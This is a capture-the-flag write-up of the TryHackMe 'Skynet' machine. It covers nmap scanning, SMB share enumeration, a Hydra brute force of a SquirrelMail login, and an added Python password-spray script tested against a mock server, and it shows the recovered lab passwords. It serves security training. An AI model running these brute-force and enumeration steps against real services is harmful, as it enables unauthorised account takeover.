Writeup TryHackMe Skynet
Writeup about the TryHackMe Linux machine Skynet
0 - Basic info
Linux machine
1 - Reconnaissance and enumeration
Nmap scan:
sudo nmap -sS -sC -sV -O -p- -oN scan.txt --script vuln 10.10.😄 -Pn
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-17 21:32 CEST
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
| Hosts that seem down (vulnerable):
|_ 224.0.0.251
Nmap scan report for 10.10.😄
Host is up (0.036s latency).
Not shown: 65529 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.10.😄
| Found the following possible CSRF vulnerabilities:
|
| Path: http://10.10.😄:80/
| Form id:
|_ Form action: #
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
| /squirrelmail/src/login.php: squirrelmail version 1.4.23 [svn]
|_ /squirrelmail/images/sm_logo.png: SquirrelMail
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| vulners:
| Apache httpd 2.4.18:
| HTTPD:F564BBA32AA088833DA032B7EB77CA29 7.5 https://vulners.com/httpd/HTTPD:F564BBA32AA088833DA032B7EB77CA29
| HTTPD:E74D6161229FA3D00A1783E6C3426C5D 7.5 https://vulners.com/httpd/HTTPD:E74D6161229FA3D00A1783E6C3426C5D
| HTTPD:C7D2DA1ACB016A5220CA8E74647BED26 7.5 https://vulners.com/httpd/HTTPD:C7D2DA1ACB016A5220CA8E74647BED26
| HTTPD:8F00FB1DD7567228376803FEDB0EC3B6 7.5 https://vulners.com/httpd/HTTPD:8F00FB1DD7567228376803FEDB0EC3B6
| HTTPD:7EEE138FD834328B3FC98E4B7FCAD266 7.5 https://vulners.com/httpd/HTTPD:7EEE138FD834328B3FC98E4B7FCAD266
| HTTPD:24E96D438275A8177C289509C796525C 7.5 https://vulners.com/httpd/HTTPD:24E96D438275A8177C289509C796525C
| HTTPD:237FAB5DE739A612077A245192137A48 7.5 https://vulners.com/httpd/HTTPD:237FAB5DE739A612077A245192137A48
| HTTPD:143F3A43D871E3AFFF956DB1049A6A2A 7.5 https://vulners.com/httpd/HTTPD:143F3A43D871E3AFFF956DB1049A6A2A
| HTTPD:0C6EE30D77005EBF2B39E351B1F3E2C4 7.5 https://vulners.com/httpd/HTTPD:0C6EE30D77005EBF2B39E351B1F3E2C4
| MSF:ILITIES/REDHAT_LINUX-CVE-2019-0211/ 7.2 https://vulners.com/metasploit/MSF:ILITIES/REDHAT_LINUX-CVE-2019-0211/ *EXPLOIT*
| MSF:ILITIES/IBM-HTTP_SERVER-CVE-2019-0211/ 7.2 https://vulners.com/metasploit/MSF:ILITIES/IBM-HTTP_SERVER-CVE-2019-0211/ *EXPLOIT*
| HTTPD:FC354B921BA807DFCACD7CD3C1D02FF9 7.2 https://vulners.com/httpd/HTTPD:FC354B921BA807DFCACD7CD3C1D02FF9
| EXPLOITPACK:44C5118F831D55FAF4259C41D8BDA0AB 7.2 https://vulners.com/exploitpack/EXPLOITPACK:44C5118F831D55FAF4259C41D8BDA0AB *EXPLOIT*
| 1337DAY-ID-32502 7.2 https://vulners.com/zdt/1337DAY-ID-32502*EXPLOIT*
| MSF:ILITIES/REDHAT_LINUX-CVE-2017-15715/ 6.8 https://vulners.com/metasploit/MSF:ILITIES/REDHAT_LINUX-CVE-2017-15715/ *EXPLOIT*
| MSF:ILITIES/ORACLE-SOLARIS-CVE-2017-15715/ 6.8 https://vulners.com/metasploit/MSF:ILITIES/ORACLE-SOLARIS-CVE-2017-15715/ *EXPLOIT*
| MSF:ILITIES/IBM-HTTP_SERVER-CVE-2017-15715/ 6.8 https://vulners.com/metasploit/MSF:ILITIES/IBM-HTTP_SERVER-CVE-2017-15715/ *EXPLOIT*
| MSF:ILITIES/HUAWEI-EULEROS-2_0_SP3-CVE-2018-1312/ 6.8 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP3-CVE-2018-1312/ *EXPLOIT*
| MSF:ILITIES/HUAWEI-EULEROS-2_0_SP3-CVE-2017-15715/ 6.8 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP3-CVE-2017-15715/ *EXPLOIT*
| MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2018-1312/ 6.8 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2018-1312/ *EXPLOIT*
| MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2017-15715/ 6.8 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2017-15715/ *EXPLOIT*
| MSF:ILITIES/HUAWEI-EULEROS-2_0_SP1-CVE-2018-1312/ 6.8 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP1-CVE-2018-1312/ *EXPLOIT*
| MSF:ILITIES/CENTOS_LINUX-CVE-2017-15715/ 6.8 https://vulners.com/metasploit/MSF:ILITIES/CENTOS_LINUX-CVE-2017-15715/ *EXPLOIT*
| MSF:ILITIES/ALPINE-LINUX-CVE-2018-1312/ 6.8 https://vulners.com/metasploit/MSF:ILITIES/ALPINE-LINUX-CVE-2018-1312/ *EXPLOIT*
| HTTPD:9CDB89FBD1162B1E462FDF5BEA375759 6.8 https://vulners.com/httpd/HTTPD:9CDB89FBD1162B1E462FDF5BEA375759
| HTTPD:13B5FCC9676077F8FD08063C83511140 6.8 https://vulners.com/httpd/HTTPD:13B5FCC9676077F8FD08063C83511140
| HTTPD:B057D0A07B0AC97248CE6210E08ACAF7 6.4 https://vulners.com/httpd/HTTPD:B057D0A07B0AC97248CE6210E08ACAF7
| HTTPD:99188FFDCAF9C4932D00C218A2E58EC7 6.4 https://vulners.com/httpd/HTTPD:99188FFDCAF9C4932D00C218A2E58EC7
| HTTPD:531CF2A74E1A5A02A1D6AE2505AD586F 6.4 https://vulners.com/httpd/HTTPD:531CF2A74E1A5A02A1D6AE2505AD586F
| MSF:ILITIES/REDHAT_LINUX-CVE-2019-0217/ 6.0 https://vulners.com/metasploit/MSF:ILITIES/REDHAT_LINUX-CVE-2019-0217/ *EXPLOIT*
| MSF:ILITIES/IBM-HTTP_SERVER-CVE-2019-0217/ 6.0 https://vulners.com/metasploit/MSF:ILITIES/IBM-HTTP_SERVER-CVE-2019-0217/ *EXPLOIT*
| HTTPD:1696C4DDCBC58CE20005FCB002958C09 6.0 https://vulners.com/httpd/HTTPD:1696C4DDCBC58CE20005FCB002958C09
| HTTPD:BC81F521379C9038153151EAA84492CA 5.8 https://vulners.com/httpd/HTTPD:BC81F521379C9038153151EAA84492CA
| HTTPD:01BB9C701A4D4302EF59FA7EA89D9115 5.8 https://vulners.com/httpd/HTTPD:01BB9C701A4D4302EF59FA7EA89D9115
| EDB-ID:47689 5.8 https://vulners.com/exploitdb/EDB-ID:47689 *EXPLOIT*
| 1337DAY-ID-33577 5.8 https://vulners.com/zdt/1337DAY-ID-33577*EXPLOIT*
| HTTPD:F292DF1CEE1729E4240D1D62A10F5D32 5.1 https://vulners.com/httpd/HTTPD:F292DF1CEE1729E4240D1D62A10F5D32
| HTTPD:CE14FA5A5B1A2BE3A35EA809C9D8CFF7 5.1 https://vulners.com/httpd/HTTPD:CE14FA5A5B1A2BE3A35EA809C9D8CFF7
| HTTPD:79096CA36FAE041205EFAB66A6D4EF4B 5.1 https://vulners.com/httpd/HTTPD:79096CA36FAE041205EFAB66A6D4EF4B
| SSV:96537 5.0 https://vulners.com/seebug/SSV:96537 *EXPLOIT*
| MSF:ILITIES/ORACLE-SOLARIS-CVE-2020-1934/ 5.0 https://vulners.com/metasploit/MSF:ILITIES/ORACLE-SOLARIS-CVE-2020-1934/ *EXPLOIT*
| MSF:ILITIES/ORACLE-SOLARIS-CVE-2017-15710/ 5.0 https://vulners.com/metasploit/MSF:ILITIES/ORACLE-SOLARIS-CVE-2017-15710/ *EXPLOIT*
| MSF:ILITIES/IBM-HTTP_SERVER-CVE-2017-15710/ 5.0 https://vulners.com/metasploit/MSF:ILITIES/IBM-HTTP_SERVER-CVE-2017-15710/ *EXPLOIT*
| MSF:ILITIES/IBM-HTTP_SERVER-CVE-2016-8743/ 5.0 https://vulners.com/metasploit/MSF:ILITIES/IBM-HTTP_SERVER-CVE-2016-8743/ *EXPLOIT*
| MSF:ILITIES/IBM-HTTP_SERVER-CVE-2016-2161/ 5.0 https://vulners.com/metasploit/MSF:ILITIES/IBM-HTTP_SERVER-CVE-2016-2161/ *EXPLOIT*
| MSF:ILITIES/IBM-HTTP_SERVER-CVE-2016-0736/ 5.0 https://vulners.com/metasploit/MSF:ILITIES/IBM-HTTP_SERVER-CVE-2016-0736/ *EXPLOIT*
| MSF:ILITIES/HUAWEI-EULEROS-2_0_SP3-CVE-2017-15710/ 5.0 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP3-CVE-2017-15710/ *EXPLOIT*
| MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2017-15710/ 5.0 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2017-15710/ *EXPLOIT*
| MSF:ILITIES/CENTOS_LINUX-CVE-2017-15710/ 5.0 https://vulners.com/metasploit/MSF:ILITIES/CENTOS_LINUX-CVE-2017-15710/ *EXPLOIT*
| MSF:AUXILIARY/SCANNER/HTTP/APACHE_OPTIONSBLEED 5.0 https://vulners.com/metasploit/MSF:AUXILIARY/SCANNER/HTTP/APACHE_OPTIONSBLEED *EXPLOIT*
| HTTPD:E91F31FD116386F2922B3EDA4BE3899B 5.0 https://vulners.com/httpd/HTTPD:E91F31FD116386F2922B3EDA4BE3899B
| HTTPD:E05CACB9D575871BA1E3088D02930266 5.0 https://vulners.com/httpd/HTTPD:E05CACB9D575871BA1E3088D02930266
| HTTPD:D7BF4648C333C0F770A30DEB0A23601C 5.0 https://vulners.com/httpd/HTTPD:D7BF4648C333C0F770A30DEB0A23601C
| HTTPD:D5609C15618DCADFDAD5AD396F2B83D7 5.0 https://vulners.com/httpd/HTTPD:D5609C15618DCADFDAD5AD396F2B83D7
| HTTPD:D5091608B1DC5DB5CABE405261B7658E 5.0 https://vulners.com/httpd/HTTPD:D5091608B1DC5DB5CABE405261B7658E
| HTTPD:D26626D944F16D90B877FB157E4A128F 5.0 https://vulners.com/httpd/HTTPD:D26626D944F16D90B877FB157E4A128F
| HTTPD:D0D55654F7429E8A4965CBBE30779CD6 5.0 https://vulners.com/httpd/HTTPD:D0D55654F7429E8A4965CBBE30779CD6
| HTTPD:C191D6FAD0C97D0A2E0A2A9F7BFE6B38 5.0 https://vulners.com/httpd/HTTPD:C191D6FAD0C97D0A2E0A2A9F7BFE6B38
| HTTPD:BD5F2FE0FF24D28F3450C11422A68AC8 5.0 https://vulners.com/httpd/HTTPD:BD5F2FE0FF24D28F3450C11422A68AC8
| HTTPD:B2B68FFCE0FB45D09BE91EE9ECBA07F6 5.0 https://vulners.com/httpd/HTTPD:B2B68FFCE0FB45D09BE91EE9ECBA07F6
| HTTPD:A5459AF02C9EC35CE80EA173C36C3F47 5.0 https://vulners.com/httpd/HTTPD:A5459AF02C9EC35CE80EA173C36C3F47
| HTTPD:99477914E1BE8FA85CEA0E956232C4C2 5.0 https://vulners.com/httpd/HTTPD:99477914E1BE8FA85CEA0E956232C4C2
| HTTPD:824D39D8A30F1234C966CBDA41E1C446 5.0 https://vulners.com/httpd/HTTPD:824D39D8A30F1234C966CBDA41E1C446
| HTTPD:73656ED41609146303D488C86337BC2D 5.0 https://vulners.com/httpd/HTTPD:73656ED41609146303D488C86337BC2D
| HTTPD:6CAC4F8B58BB2BE168795A6BA0CA26A1 5.0 https://vulners.com/httpd/HTTPD:6CAC4F8B58BB2BE168795A6BA0CA26A1
| HTTPD:5D6E315A1B98558C0DF8CBE51264FBA5 5.0 https://vulners.com/httpd/HTTPD:5D6E315A1B98558C0DF8CBE51264FBA5
| HTTPD:4EC9662496A151DDE6D030D9127572E7 5.0 https://vulners.com/httpd/HTTPD:4EC9662496A151DDE6D030D9127572E7
| HTTPD:42FA2547862AB3B3F5E7F776E2D90614 5.0 https://vulners.com/httpd/HTTPD:42FA2547862AB3B3F5E7F776E2D90614
| HTTPD:3647863A8E4AE972669D5EE60974E777 5.0 https://vulners.com/httpd/HTTPD:3647863A8E4AE972669D5EE60974E777
| HTTPD:18105DABC6D0ADE97D12B90F63EAE025 5.0 https://vulners.com/httpd/HTTPD:18105DABC6D0ADE97D12B90F63EAE025
| HTTPD:174A0D44882BCA7E2F229BC91D6D5A09 5.0 https://vulners.com/httpd/HTTPD:174A0D44882BCA7E2F229BC91D6D5A09
| HTTPD:04C30566E99EFB3C0D60F08EE2524591 5.0 https://vulners.com/httpd/HTTPD:04C30566E99EFB3C0D60F08EE2524591
| EXPLOITPACK:DAED9B9E8D259B28BF72FC7FDC4755A7 5.0 https://vulners.com/exploitpack/EXPLOITPACK:DAED9B9E8D259B28BF72FC7FDC4755A7 *EXPLOIT*
| EXPLOITPACK:C8C256BE0BFF5FE1C0405CB0AA9C075D 5.0 https://vulners.com/exploitpack/EXPLOITPACK:C8C256BE0BFF5FE1C0405CB0AA9C075D *EXPLOIT*
| EXPLOITPACK:2666FB0676B4B582D689921651A30355 5.0 https://vulners.com/exploitpack/EXPLOITPACK:2666FB0676B4B582D689921651A30355 *EXPLOIT*
| EDB-ID:40909 5.0 https://vulners.com/exploitdb/EDB-ID:40909 *EXPLOIT*
| 1337DAY-ID-28573 5.0 https://vulners.com/zdt/1337DAY-ID-28573*EXPLOIT*
| 1337DAY-ID-26574 5.0 https://vulners.com/zdt/1337DAY-ID-26574*EXPLOIT*
| MSF:ILITIES/DEBIAN-CVE-2019-10092/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/DEBIAN-CVE-2019-10092/ *EXPLOIT*
| MSF:ILITIES/APACHE-HTTPD-CVE-2020-11985/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/APACHE-HTTPD-CVE-2020-11985/ *EXPLOIT*
| MSF:ILITIES/APACHE-HTTPD-CVE-2019-10092/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/APACHE-HTTPD-CVE-2019-10092/ *EXPLOIT*
| HTTPD:FF57290724543D4766EDDC4666992FE8 4.3 https://vulners.com/httpd/HTTPD:FF57290724543D4766EDDC4666992FE8
| HTTPD:F4FBBB7467F08F96828B98E753E5FE7D 4.3 https://vulners.com/httpd/HTTPD:F4FBBB7467F08F96828B98E753E5FE7D
| HTTPD:D94ACD37B5627A621B2D592BD44873F2 4.3 https://vulners.com/httpd/HTTPD:D94ACD37B5627A621B2D592BD44873F2
| HTTPD:D26FFC4C8AA598C5F130A0223836644E 4.3 https://vulners.com/httpd/HTTPD:D26FFC4C8AA598C5F130A0223836644E
| HTTPD:A5773ECB3CB67826707B252F21BB80BB 4.3 https://vulners.com/httpd/HTTPD:A5773ECB3CB67826707B252F21BB80BB
| HTTPD:86C509FC37A85DC3C01E3CE10402C6DC 4.3 https://vulners.com/httpd/HTTPD:86C509FC37A85DC3C01E3CE10402C6DC
| HTTPD:714A18409AEB3B8362DC4FA2B923CA7A 4.3 https://vulners.com/httpd/HTTPD:714A18409AEB3B8362DC4FA2B923CA7A
| HTTPD:43E63F90DCA6F418ACF2327C4F88C3D8 4.3 https://vulners.com/httpd/HTTPD:43E63F90DCA6F418ACF2327C4F88C3D8
| EDB-ID:47688 4.3 https://vulners.com/exploitdb/EDB-ID:47688 *EXPLOIT*
| 1337DAY-ID-33575 4.3 https://vulners.com/zdt/1337DAY-ID-33575*EXPLOIT*
| MSF:ILITIES/REDHAT_LINUX-CVE-2018-1283/ 3.5 https://vulners.com/metasploit/MSF:ILITIES/REDHAT_LINUX-CVE-2018-1283/ *EXPLOIT*
| MSF:ILITIES/ORACLE-SOLARIS-CVE-2018-1283/ 3.5 https://vulners.com/metasploit/MSF:ILITIES/ORACLE-SOLARIS-CVE-2018-1283/ *EXPLOIT*
| MSF:ILITIES/IBM-HTTP_SERVER-CVE-2018-1283/ 3.5 https://vulners.com/metasploit/MSF:ILITIES/IBM-HTTP_SERVER-CVE-2018-1283/ *EXPLOIT*
| MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2018-1283/ 3.5 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2018-1283/ *EXPLOIT*
| MSF:ILITIES/CENTOS_LINUX-CVE-2018-1283/ 3.5 https://vulners.com/metasploit/MSF:ILITIES/CENTOS_LINUX-CVE-2018-1283/ *EXPLOIT*
| HTTPD:2E568217BC35E0AA91DF49E7CE65CA67 3.5 https://vulners.com/httpd/HTTPD:2E568217BC35E0AA91DF49E7CE65CA67
| PACKETSTORM:152441 0.0 https://vulners.com/packetstorm/PACKETSTORM:152441 *EXPLOIT*
| PACKETSTORM:140265 0.0 https://vulners.com/packetstorm/PACKETSTORM:140265 *EXPLOIT*
| HTTPD:B6CF5630624F83951A477D36DC8FD634 0.0 https://vulners.com/httpd/HTTPD:B6CF5630624F83951A477D36DC8FD634
| HTTPD:94C27BCF50CA81A222019B9F06735AA1 0.0 https://vulners.com/httpd/HTTPD:94C27BCF50CA81A222019B9F06735AA1
| HTTPD:914D0BB6DF64CDA58BDF1461563DCBC2 0.0 https://vulners.com/httpd/HTTPD:914D0BB6DF64CDA58BDF1461563DCBC2
| HTTPD:7ED2E94FC8175AF57B0B84C966E78986 0.0 https://vulners.com/httpd/HTTPD:7ED2E94FC8175AF57B0B84C966E78986
| HTTPD:55F8C86BB4FE80544B301C6F772E1F21 0.0 https://vulners.com/httpd/HTTPD:55F8C86BB4FE80544B301C6F772E1F21
| HTTPD:53F7D531D201D0209EE31F3FA8829F5B 0.0 https://vulners.com/httpd/HTTPD:53F7D531D201D0209EE31F3FA8829F5B
| HTTPD:21A860C56B7B6A55960FB17E72B7E4B4 0.0 https://vulners.com/httpd/HTTPD:21A860C56B7B6A55960FB17E72B7E4B4
| EDB-ID:46676 0.0 https://vulners.com/exploitdb/EDB-ID:46676 *EXPLOIT*
| EDB-ID:42745 0.0 https://vulners.com/exploitdb/EDB-ID:42745 *EXPLOIT*
| EDB-ID:40961 0.0 https://vulners.com/exploitdb/EDB-ID:40961 *EXPLOIT*
|_ 1337DAY-ID-531 0.0 https://vulners.com/zdt/1337DAY-ID-531 *EXPLOIT*
110/tcp open pop3 Dovecot pop3d
|_sslv2-drown:
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd
|_sslv2-drown:
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=6/17%OT=22%CT=1%CU=34749%PV=Y%DS=2%DC=I%G=Y%TM=60CBA4D
OS:5%P=x86_64-pc-linux-gnu)SEQ(SP=FD%GCD=1%ISR=FA%TI=Z%CI=I%II=I%TS=8)OPS(O
OS:1=M506ST11NW7%O2=M506ST11NW7%O3=M506NNT11NW7%O4=M506ST11NW7%O5=M506ST11N
OS:W7%O6=M506ST11)WIN(W1=68DF%W2=68DF%W3=68DF%W4=68DF%W5=68DF%W6=68DF)ECN(R
OS:=Y%DF=Y%T=40%W=6903%O=M506NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%
OS:RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y
OS:%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R
OS:%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=
OS:40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S
OS:)
Network Distance: 2 hops
Service Info: Host: SKYNET; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: false
| smb-vuln-regsvc-dos:
| VULNERABLE:
| Service regsvc in Microsoft Windows systems vulnerable to denial of service
| State: VULNERABLE
| The service regsvc in Microsoft Windows 2000 systems is vulnerable to denial of service caused by a null deference
| pointer. This script will crash the service if it is vulnerable. This vulnerability was discovered by Ron Bowes
| while working on smb-enum-sessions.
|_
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 404.60 seconds
Open ports: 22 (OpenSSH 7.2p2), 80 (Apache 2.4.18), 110/143 (Dovecot POP3/IMAP), 139/445 (Samba). Two caveats about the --script vuln output: the long vulners list is version-string matching against "Apache httpd 2.4.18", not confirmed findings, and smb-vuln-regsvc-dos probes a Windows 2000 service, so its VULNERABLE verdict against a Samba host is a false positive.
Port 80 is open but there is nothing useful on the index page, just a search form that POSTs to itself:
<!DOCTYPE html>
<html>
<head>
<link rel="stylesheet" type="text/css" href="style.css">
<link rel="shortcut icon" type="image/png" href="favicon.ico"/>
<title>Skynet</title>
</head>
<body>
<div>
<img src="image.png"/>
<form name="skynet" action="#" method="POST"><br>
<input type="search" class="search"><br>
<input type="submit" class="button" name="submit" value="Skynet Search">
<input type="submit" class="button" name="lucky" value="I'm Feeling Lucky">
</form>
</div>
</body>
</html>
http-enum found an interesting path on port 80: /squirrelmail/src/login.php, SquirrelMail version 1.4.23 [svn].
It is the SquirrelMail login form.
SquirrelMail 1.4.23 is vulnerable to RCE (CVE-2017-7692), but only post-authentication, so I need to find some credentials to make it work:
https://legalhackers.com/advisories/SquirrelMail-Exploit-Remote-Code-Exec-CVE-2017-7692-Vuln.html
Testing SMB on port 445 with a null session:
smbclient --no-pass -L //10.10.😄
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
anonymous Disk Skynet Anonymous Share
milesdyson Disk Miles Dyson Personal Share
IPC$ IPC IPC Service (skynet server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available
There are some shares to test; first the anonymous share:
smbclient --no-pass //10.10.😄/anonymous
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Nov 26 17:04:00 2020
.. D 0 Tue Sep 17 09:20:17 2019
attention.txt N 163 Wed Sep 18 05:04:59 2019
logs D 0 Wed Sep 18 06:42:16 2019
9204224 blocks of size 1024. 5831108 blocks available
Downloading the text file:
get attention.txt
Inside the logs directory there are three log files, only one with content, so I downloaded log1.txt:
get log1.txt
Looking into the files:
cat attention.txt
A recent system malfunction has caused various passwords to be changed. All skynet employees are required to change their password after seeing this.
-Miles Dyson
cat log1.txt
cyborg007haloterminator
terminator22596
terminator219
terminator20
terminator1989
terminator1988
terminator168
terminator16
terminator143
terminator13
terminator123!@#
terminator1056
terminator101
terminator10
terminator02
terminator00
roboterminator
pongterminator
manasturcaluterminator
exterminator95
exterminator200
dterminator
djxterminator
dexterminator
determinator
cyborg007haloterminator
avsterminator
alonsoterminator
Walterminator
79terminator6
1996terminator
The note says passwords were changed, and log1.txt looks very much like a list of passwords, so I can use it as a wordlist with Hydra against the SquirrelMail login form.
2 - Vulnerability Identification
Brute-forcing the SquirrelMail login with Hydra, using log1.txt (saved as pass.txt) as the password list. The failure string is the error login.php shows after a bad login:
hydra -l milesdyson -P /home/u915/Escritorio/tryhackme/skynet/pass.txt 10.10.😄 http-post-form "/squirrelmail/src/redirect.php:login_username=milesdyson&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1:Unknown user or password incorrect."
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-06-17 22:30:20
[DATA] max 16 tasks per 1 server, overall 16 tasks, 31 login tries (l:1/p:31), ~2 tries per task
[DATA] attacking http-post-form://10.10.😄:80/squirrelmail/src/redirect.php:login_username=milesdyson&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1:Unknown user or password incorrect.
[80][http-post-form] host: 10.10.😄 login: milesdyson password: cyborg007haloterminator
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-06-17 22:30:32
Great, I was lucky today: the password for the user milesdyson is cyborg007haloterminator, the very first entry of the list.
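To make the Hydra step above concrete, here is an added example (not code from the original writeup) of the same http-post-form logic in Python: it posts the four SquirrelMail login fields and, exactly like Hydra's F= failure string, reports every attempt whose response does not contain "Unknown user or password incorrect." The HTTP server in the block is a constructed stand-in for /squirrelmail/src/redirect.php so the script runs offline; the username and the wordlist entries come from the writeup, while the mock's success redirect is an assumption.

```python
"""Hydra-style password spray against a SquirrelMail login form.

Added example, not part of the writeup. The logic matches hydra's
http-post-form module with an F= failure string: every attempt whose response
does NOT contain the failure marker is reported as a hit. The HTTP server in
this file is a constructed stand-in for /squirrelmail/src/redirect.php so the
script runs offline (real SquirrelMail redirects back to login.php, which then
prints the error).
"""
import http.client
import http.server
import threading
import urllib.parse

FAILURE_MARKER = "Unknown user or password incorrect."
LOGIN_PATH = "/squirrelmail/src/redirect.php"

# Constructed credential store for the mock target (the password is the one
# recovered from log1.txt in the writeup).
MOCK_USERS = {"milesdyson": "cyborg007haloterminator"}

# A few entries from the leaked log1.txt, used as the spray list.
WORDLIST = [
    "terminator22596",
    "terminator219",
    "terminator123!@#",
    "cyborg007haloterminator",
    "1996terminator",
]


class MockRedirectPHP(http.server.BaseHTTPRequestHandler):
    """Constructed mock: 302 to webmail.php on success, error text otherwise."""

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        form = urllib.parse.parse_qs(self.rfile.read(length).decode())
        user = form.get("login_username", [""])[0]
        secret = form.get("secretkey", [""])[0]
        if MOCK_USERS.get(user) == secret:
            self.send_response(302)
            self.send_header("Location", "/squirrelmail/src/webmail.php")
            self.end_headers()
            return
        body = f"<html><body>{FAILURE_MARKER}</body></html>".encode()
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # silence per-request logging
        pass


def try_login(host, port, user, password):
    """One POST with the same four fields the writeup's hydra command sends.
    Redirects are not followed: a 302 with an empty body simply lacks the
    failure marker, which is all the failure-string check looks at."""
    conn = http.client.HTTPConnection(host, port, timeout=5)
    data = urllib.parse.urlencode({
        "login_username": user,
        "secretkey": password,
        "js_autodetect_results": "1",
        "just_logged_in": "1",
    })
    conn.request("POST", LOGIN_PATH, body=data,
                 headers={"Content-Type": "application/x-www-form-urlencoded"})
    resp = conn.getresponse()
    body = resp.read().decode(errors="replace")
    conn.close()
    return resp.status, body


def spray(host, port, user, wordlist, failure_marker=FAILURE_MARKER):
    """Report every password whose response lacks the failure marker.
    Sanity check: if nothing ever fails, the marker is wrong (or the app now
    answers with something else, e.g. a lockout page) and the hits are noise."""
    hits = [pw for pw in wordlist
            if failure_marker not in try_login(host, port, user, pw)[1]]
    if wordlist and len(hits) == len(wordlist):
        raise RuntimeError("every attempt looked like a success: check the failure string")
    return hits


def start_mock_server():
    srv = http.server.HTTPServer(("127.0.0.1", 0), MockRedirectPHP)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def demo():
    """Spray the mock target; returns the list of recovered passwords."""
    srv = start_mock_server()
    try:
        host, port = srv.server_address
        return spray(host, port, "milesdyson", WORDLIST)
    finally:
        srv.shutdown()
        srv.server_close()


if __name__ == "__main__":
    print("valid password(s):", demo())
```

The all-attempts-succeeded check is the part worth keeping from this: a failure-string match silently turns any unexpected response (lockout page, 500 error, changed wording) into a "valid password", so always confirm a Hydra hit with a manual login before building on it.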
Logging into SquirrelMail with these credentials reveals an interesting mail:
We have changed your smb password after system malfunction.
Password: )s{A&2Z=F^n_E.B`
Another password, this time for the password-protected personal share, milesdyson:
smbclient -U milesdyson //10.10.😄/milesdyson
Enter WORKGROUP\milesdyson's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Tue Sep 17 11:05:47 2019
.. D 0 Wed Sep 18 05:51:03 2019
Improving Deep Neural Networks.pdf N 5743095 Tue Sep 17 11:05:14 2019
Natural Language Processing-Building Sequence Models.pdf N 12927230 Tue Sep 17 11:05:14 2019
Convolutional Neural Networks-CNN.pdf N 19655446 Tue Sep 17 11:05:14 2019
notes D 0 Tue Sep 17 11:18:40 2019
Neural Networks and Deep Learning.pdf N 4304586 Tue Sep 17 11:05:14 2019
Structuring your Machine Learning Project.pdf N 3531427 Tue Sep 17 11:05:14 2019
9204224 blocks of size 1024. 5830948 blocks available
Looking inside the path notes:
smb: \notes\> ls
. D 0 Tue Sep 17 11:18:40 2019
.. D 0 Tue Sep 17 11:05:47 2019
3.01 Search.md N 65601 Tue Sep 17 11:01:29 2019
4.01 Agent-Based Models.md N 5683 Tue Sep 17 11:01:29 2019
2.08 In Practice.md N 7949 Tue Sep 17 11:01:29 2019
0.00 Cover.md N 3114 Tue Sep 17 11:01:29 2019
